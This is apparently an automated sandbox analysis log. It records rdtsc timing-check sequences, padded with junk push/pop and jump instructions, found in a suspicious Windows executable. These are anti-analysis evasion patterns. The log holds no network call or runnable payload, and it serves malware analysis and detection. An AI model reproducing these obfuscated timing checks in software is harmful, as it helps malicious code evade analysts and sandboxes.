Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC2534 second address: FC255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF340810304h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007FF3408102F6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F1411E second address: F14124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC173A second address: FC173E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC173E second address: FC1749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC1BCF second address: FC1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC1BDE second address: FC1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC1EF4 second address: FC1F13 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3408102FBh 0x0000000f jnp 00007FF3408102F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC20B9 second address: FC20BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC20BD second address: FC20C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC20C1 second address: FC20EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF34080AB06h 0x00000016 jmp 00007FF34080AB18h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC20EF second address: FC20F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC868E second address: FC8692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC8C77 second address: FC8C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF3408102FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC8DD0 second address: FC8DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC8DD4 second address: FC8DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC90B3 second address: FC90B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC9BF0 second address: FC9BFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC9BFA second address: FC9C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF34080AB0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FC9C0C second address: FC9C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FD15C8 second address: FD15D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FD15D3 second address: FD15DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FD173A second address: FD1744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FD1744 second address: FD1748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FD1748 second address: FD1754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FDD911 second address: FDD915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FDDA7D second address: FDDA9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FDDA9F second address: FDDAAB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FDDAAB second address: FDDAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF9FEB second address: FFA006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF340810303h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FFA006 second address: FFA019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jng 00007FF34080AB06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FFA019 second address: FFA03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810301h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF8C6C second address: FF8C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF8DB0 second address: FF8DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF8DB6 second address: FF8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF8DBA second address: FF8DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF9249 second address: FF9286 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FF34080AB0Eh 0x0000000f jmp 00007FF34080AB15h 0x00000014 popad 0x00000015 push edx 0x00000016 jmp 00007FF34080AB0Bh 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF93AC second address: FF93D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007FF3408102FCh 0x00000012 jno 00007FF3408102FAh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FF93D3 second address: FF93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FFF333 second address: FFF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FFEF28 second address: FFEF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 1009598 second address: 100959D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 100959D second address: 10095C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 push ecx 0x00000008 jng 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 100E707 second address: 100E70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 100E70B second address: 100E711 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 100E711 second address: 100E758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF340810309h 0x0000000b js 00007FF340810332h 0x00000011 push esi 0x00000012 jmp 00007FF340810302h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF3408102FAh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 100E758 second address: 100E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 1010C5A second address: 1010C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 10229B4 second address: 10229B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 10229B8 second address: 10229CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF3408102F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103BC90 second address: 103BC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103BC94 second address: 103BC9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103BC9E second address: 103BCD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF34080AB11h 0x00000015 popad 0x00000016 push esi 0x00000017 jmp 00007FF34080AB0Dh 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103AE32 second address: 103AE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103AE3A second address: 103AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103AFA7 second address: 103AFC1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF340810305h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103B396 second address: 103B3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB11h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnp 00007FF34080AB06h 0x00000011 jmp 00007FF34080AB19h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 103B525 second address: 103B538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jne 00007FF3408102F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0035 second address: 56E0072 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF3408102FFh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF340810300h 0x00000015 sub si, 1DF8h 0x0000001a jmp 00007FF3408102FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0072 second address: 56E0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0077 second address: 56E0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0092 second address: 56E0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0096 second address: 56E009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E01B4 second address: 56E01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E01B9 second address: 56E026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF3408102FDh 0x00000009 add esi, 75E02D96h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 mov dh, ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov dl, cl 0x0000001e mov dx, 2EF6h 0x00000022 popad 0x00000023 mov dword ptr [esp], esi 0x00000026 pushad 0x00000027 movsx edi, cx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF340810302h 0x00000031 adc si, 5018h 0x00000036 jmp 00007FF3408102FBh 0x0000003b popfd 0x0000003c mov ebx, esi 0x0000003e popad 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 pushad 0x00000044 mov edi, eax 0x00000046 pushad 0x00000047 push eax 0x00000048 pop edi 0x00000049 pushfd 0x0000004a jmp 00007FF340810306h 0x0000004f sbb esi, 3D9DB1A8h 0x00000055 jmp 00007FF3408102FBh 0x0000005a popfd 0x0000005b popad 0x0000005c popad 0x0000005d xchg eax, edi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF340810305h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E026C second address: 56E033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E052h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF34080AB14h 0x00000012 xchg eax, edi 0x00000013 jmp 00007FF34080AB10h 0x00000018 test esi, esi 0x0000001a jmp 00007FF34080AB10h 0x0000001f je 00007FF3B2058E6Bh 0x00000025 pushad 0x00000026 mov cl, BEh 0x00000028 pushfd 0x00000029 jmp 00007FF34080AB13h 0x0000002e and eax, 7C8AE70Eh 0x00000034 jmp 00007FF34080AB19h 0x00000039 popfd 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov al, 82h 0x00000045 pushad 0x00000046 push edx 0x00000047 pop ecx 0x00000048 movsx edi, cx 0x0000004b popad 0x0000004c popad 0x0000004d je 00007FF3B2058E31h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007FF34080AB0Fh 0x0000005c xor si, 51CEh 0x00000061 jmp 00007FF34080AB19h 0x00000066 popfd 0x00000067 pushad 0x00000068 popad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E033B second address: 56E0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0341 second address: 56E03D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB17h 0x00000015 add ch, FFFFFF8Eh 0x00000018 jmp 00007FF34080AB19h 0x0000001d popfd 0x0000001e popad 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007FF34080AB0Eh 0x00000027 test edx, 61000000h 0x0000002d jmp 00007FF34080AB10h 0x00000032 jne 00007FF3B2058DE1h 0x00000038 pushad 0x00000039 mov bx, cx 0x0000003c mov ah, 02h 0x0000003e popad 0x0000003f test byte ptr [esi+48h], 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FF34080AB10h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E03D0 second address: 56E03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF3B205E5B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF340810305h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E03FC second address: 56E0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0402 second address: 56E0435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test bl, 00000007h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810305h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0746 second address: 56D074C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D074C second address: 56D0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0750 second address: 56D076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB12h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D076D second address: 56D0773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0773 second address: 56D079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF34080AB0Eh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D079F second address: 56D07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D07A3 second address: 56D07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D07C0 second address: 56D08A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7772h 0x00000007 pushfd 0x00000008 jmp 00007FF340810303h 0x0000000d adc esi, 5EA0AD6Eh 0x00000013 jmp 00007FF340810309h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF3408102FEh 0x00000022 push eax 0x00000023 pushad 0x00000024 mov edx, 2A46D394h 0x00000029 mov eax, ebx 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d jmp 00007FF3408102FFh 0x00000032 xchg eax, esi 0x00000033 jmp 00007FF340810306h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov ax, bx 0x0000003d pushfd 0x0000003e jmp 00007FF3408102FDh 0x00000043 or ax, D866h 0x00000048 jmp 00007FF340810301h 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 jmp 00007FF3408102FEh 0x00000055 mov esi, dword ptr [ebp+08h] 0x00000058 jmp 00007FF340810300h 0x0000005d sub ebx, ebx 0x0000005f jmp 00007FF340810301h 0x00000064 test esi, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D08A6 second address: 56D08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D08AA second address: 56D08AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D08AE second address: 56D08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D08B4 second address: 56D08BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D08BA second address: 56D08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
